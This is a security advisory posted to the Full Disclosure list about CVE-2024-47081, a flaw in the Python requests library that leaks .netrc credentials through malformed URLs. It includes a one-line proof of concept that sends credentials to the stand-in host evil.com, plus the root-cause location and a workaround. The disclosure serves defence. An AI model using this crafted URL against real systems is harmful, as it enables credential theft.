The PSF requests library (https://github.com/psf/requests &
https://pypi.org/project/requests/) leaks .netrc credentials to third parties
due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for example.com, they are leaked to
evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on
September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved
by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every
API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
